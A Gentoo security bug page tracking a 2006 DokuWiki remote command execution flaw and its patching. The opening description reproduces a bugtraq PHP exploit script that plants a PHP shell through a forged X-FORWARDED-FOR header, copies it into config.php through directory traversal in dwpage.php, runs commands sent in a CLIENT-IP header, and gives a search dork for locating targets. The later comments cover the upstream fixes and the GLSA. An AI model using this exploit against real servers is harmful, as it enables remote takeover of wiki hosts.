Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 146800 - www-apps/dokuwiki: PHP injection
Summary: www-apps/dokuwiki: PHP injection
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High major (vote)
Assignee: Gentoo Security
Whiteboard: B1 [glsa] frilled
Depends on:
Reported: 2006-09-08 00:04 UTC by Wolf Giesen (RETIRED)
Modified: 2006-09-28 09:09 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Wolf Giesen (RETIRED) gentoo-dev 2006-09-08 00:04:51 UTC
From bugtraq:

#!/usr/bin/php -q -d short_open_tag=on
DokuWiki <= 2006-03-09b release /bin/dwpage.php remote commands execution xploit
by rgod
dork: "Driven by DokuWiki"
works with register_argc_argv = On
if ($argc<4) {
Usage: php '.$argv[0].' host path cmd OPTIONS
host:      target server (ip/hostname)
path:      path to dokuwiki
cmd:       a shell command
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
php '.$argv[0].' localhost /wiki/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost /wiki/ ls -la -p81
/* software site:

   there are some shell scripts in /bin folder and there is no .htaccess to
   protect it: most dangerous one is dwpage.php, if register_argc_argv = On
   it allows to copy/move files among folders because of $TARGET_FN var
   directory traversal, also you can inject a shell by main doku.php script
   sending a malicious X-FORWARDED-FOR http header (but you could do the same
   uploading some file in /data/media folder through /lib/exe/media.php...,
   I choosed the first solution)

   also, I noticed, you can disclose php configuration by
   setting an http header like this calling the main doku.php

   X-DOKUWIKI-DO: debug

   (debug feature is enabled by default...)


function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;

for ($i=3; $i<$argc; $i++){
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
if ($temp=="-P")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//create /data/pages/suntzu.txt.lock and inject the shell code
$packet="POST ".$p."doku.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="X-FORWARDED-FOR: <?php set_time_limit(0);echo 'my_delim';passthru(\$_SERVER['HTTP_CLIENT_IP']);die;?>\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";

//copy /data/pages/suntzu.txt.lock to /data/pages/wiki/suntzu.txt
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+commit+../data/pages/suntzu.txt.lock+wiki:suntzu HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";

//copy /data/pages/wiki/suntzu.txt to config.php inside main folder
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+checkout+wiki:suntzu+../config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";

//launch commands...
$packet="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $cmd\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (strstr($html,"my_delim")){echo "exploit succeeded...\r\n";$temp=explode("my_delim",$html);die($temp[1]);}
else { echo "exploit failed...\r\n";}

original url:
Comment 1 Wolf Giesen (RETIRED) gentoo-dev 2006-09-08 00:13:41 UTC
web-apps, please advise, are there newer releases or any hints from upstream?
Comment 2 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-09-08 02:12:18 UTC
still no news afaict
Comment 3 Matthias Geerdsen (RETIRED) gentoo-dev 2006-09-08 03:18:04 UTC
seems to be serious; upstream is working on it:
Comment 4 Wolf Giesen (RETIRED) gentoo-dev 2006-09-08 05:51:18 UTC
Upstream hast released dokuwiki-2006-03-09c; please bump and mark stable, thank you!
Comment 5 Wolf Giesen (RETIRED) gentoo-dev 2006-09-08 14:46:37 UTC
You may postpone stabling until we have called arches <cough> ... never listen too n00b devs, but have mercy on them ... o_O.
Comment 6 Wolf Giesen (RETIRED) gentoo-dev 2006-09-11 06:04:39 UTC
pinging web-apps ^^
Comment 7 Matthias Geerdsen (RETIRED) gentoo-dev 2006-09-11 07:09:14 UTC
CC'ing ramereth, since he does not seem to be on the web-apps alias
Comment 8 Lance Albertson (RETIRED) gentoo-dev 2006-09-11 08:27:52 UTC
(In reply to comment #7)
> CC'ing ramereth, since he does not seem to be on the web-apps alias

Wow, took you guys long enough to add me to the bug. I'll look into getting a new ebuild in today and checking on this. Thanks.
Comment 9 Lance Albertson (RETIRED) gentoo-dev 2006-09-11 08:59:34 UTC
20060309c is now in cvs. Please test with all the affected arches. I also added myself to the announce list for dokuwiki, so hopefully I know about this sooner.
Comment 10 Wolf Giesen (RETIRED) gentoo-dev 2006-09-12 01:25:16 UTC
Arches, please test and mark stable, thanks!

Lance, did you add yourself to web-apps, BTW?
Comment 11 Wolf Giesen (RETIRED) gentoo-dev 2006-09-12 01:30:10 UTC
Hmpf. No JavaScript, no working Add Archs button. Sorry for the bugspam. Arches, please test & stable.
Comment 12 Andrej Kacian (RETIRED) gentoo-dev 2006-09-12 02:19:14 UTC
x86 safe
Comment 13 Tobias Scherbaum (RETIRED) gentoo-dev 2006-09-12 08:12:54 UTC
Wasn't stable for ppc before ...
Comment 14 Wolf Giesen (RETIRED) gentoo-dev 2006-09-12 09:24:14 UTC
Ready for GLSA...
Comment 15 Lance Albertson (RETIRED) gentoo-dev 2006-09-12 11:45:00 UTC
I just noticed an odd 'bug' with the 20060309c release of the package. When you ask it what version it is, it claims its still 20060309b, but its really 20060309c. I just sent an email to upstream because I see that the version file they have in the tarball says that. Just something to maybe note in the GLSA, I'm not sure. Of course portage reports it as 20060309c, its just a matter of what dokuwiki will say it is.
Comment 16 Stefan Cornelius (RETIRED) gentoo-dev 2006-09-12 11:51:21 UTC
heads up guys ... at work i had a look at this, and it seems that the fix consisted of a .htpasswd file only - $HTTP_SERVER could ignore this, leaving a system vulnerable - pls check
Comment 17 Lance Albertson (RETIRED) gentoo-dev 2006-09-12 12:31:54 UTC
(In reply to comment #16)
> heads up guys ... at work i had a look at this, and it seems that the fix
> consisted of a .htpasswd file only - $HTTP_SERVER could ignore this, leaving a
> system vulnerable - pls check

It looks like the fix [1] should be me moving it entirely out of the htdocs dir and place it outside of the realm of the webserver. The php file that has the flaw was never intended to be viewed to the world [2]. I'll see if I can come up with an ebuild that adjusts it to follow that.

Can you try this solution and see if it fixes the issues that are outlined?

Please hold on releasing the GLSA until we get this sorted out.

Comment 18 Matthias Geerdsen (RETIRED) gentoo-dev 2006-09-12 15:44:57 UTC
the quick 'fix' was indeed to add the .htaccess to the tarball

there is also a short discussion on the dokuwiki mailinglist about a different directory layout and stuff, the debian maintainer for dokuwiki commented there too (they already move some stuff out of the webdir cause of their policies)
Comment 19 Wolf Giesen (RETIRED) gentoo-dev 2006-09-12 22:18:23 UTC
I wonder how many people would benefit from that "fix" ... none of my installations has Overrides on :/

Lance, seems like moving the stuff away seems a _much_ better idea ...
Comment 20 Stuart Herbert (RETIRED) gentoo-dev 2006-09-13 02:57:14 UTC

Just to chip in here ... any fix that relies on .htaccess files isn't fit for purpose.  It's Apache-specific at best (we support more than just Apache), and it relies on Apache being configured to pick up the .htaccess file - which you can't guarantee.

Best regards,
Comment 21 Matthias Geerdsen (RETIRED) gentoo-dev 2006-09-13 03:00:50 UTC
just as info...

Last two comments on the dokuwiki bug:

Comment by Andreas Gohr (andi) - Friday, 08 September 2006, 08:22PM

If you don't know what the files in the bin folder are good for, you probably never used the files in it and can safely delete the whole folder. The bin folder contains scripts to be run on a commandline to automate certain tasks in DokuWiki.

Comment by Christopher Smith (ChrisS) - Monday, 11 September 2006, 02:35PM

Development version patched to add a sapi check at the start of each of the scripts in the lib/bin directory and have the script abort if the script isn't being run using the 'cli' sapi - ie, the scripts will abort immediately if run by the webserver.
Comment 22 Thomas Cort (RETIRED) gentoo-dev 2006-09-13 05:27:11 UTC
amd64 doesn't have any stable versions, so I don't see what we're supposed to be doing on this bug. If you need us for something, please re-add us.
Comment 23 Lance Albertson (RETIRED) gentoo-dev 2006-09-13 11:02:09 UTC
(In reply to comment #20)
> Hi,
> Just to chip in here ... any fix that relies on .htaccess files isn't fit for
> purpose.  It's Apache-specific at best (we support more than just Apache), and
> it relies on Apache being configured to pick up the .htaccess file - which you
> can't guarantee.

Yup, I totally agree. I'm going to be busy most of today, but I'll try my best to get a fix for this soon. Just to recap:

 * I need to move the bin dir to a non-docroot (possibly /usr/share/docs?) location

I don't need to change anything else, correct? I'm having a little hard time following all the vulunerabilites that's cropped up for doku in the last week or so.

Comment 24 Wolf Giesen (RETIRED) gentoo-dev 2006-09-13 11:05:02 UTC
That's what I was sugesting befor mid-air collision ^^. Could you go ahead so we can shove this one out, it kinda hurts :/

Thank you!
Comment 25 Lance Albertson (RETIRED) gentoo-dev 2006-09-13 11:57:35 UTC
I just got an email on the list concerning my questions:


Damned. Yes I forgot to update the VERSION file. Anyway I just uploaded
a new tarball named 2006-03-09d where I upped the VERSION string and
added the recently added sapi name checks to the commandline scripts.

Note: I just updated the DNS for, if you don't see
the new tarball just try again in a few hours.



While the sapi name check helps, I'm still going to plan to move that directory out of the docroot. I have a meeting in 30 minutes, and hope to crack at this after the meeting. 
Comment 26 Wolf Giesen (RETIRED) gentoo-dev 2006-09-13 23:28:32 UTC
Changing back to [ebuild] for now, since Lance is still working on it.
Comment 27 Wolf Giesen (RETIRED) gentoo-dev 2006-09-14 00:49:28 UTC
Also rerating to B1 (direct exploit).
Comment 28 Lance Albertson (RETIRED) gentoo-dev 2006-09-14 06:27:34 UTC
I just committed 20060309d into cvs. This ebuild moves the scripts in the bin directory to the packages doc dir under the directory named scripts/ and are gziped. Please test and mark stable. I will remove the older ebuilds once things get marked stable and the GLSA is out. Thanks!
Comment 29 Wolf Giesen (RETIRED) gentoo-dev 2006-09-14 06:59:19 UTC
cc'ing x86 again for stabling 20060309d.

GLSA is drafted, SecTeam pls. review, this one should go out _fast_ now, thanks!
Comment 30 Chris Gianelloni (RETIRED) gentoo-dev 2006-09-14 07:40:31 UTC
x86 done
Comment 31 Wolf Giesen (RETIRED) gentoo-dev 2006-09-14 08:12:34 UTC
Comment 32 Sune Kloppenborg Jeppesen gentoo-dev 2006-09-14 09:21:17 UTC
Thx everyone.

GLSA 200609-10
Comment 33 Wolf Giesen (RETIRED) gentoo-dev 2006-09-28 09:09:26 UTC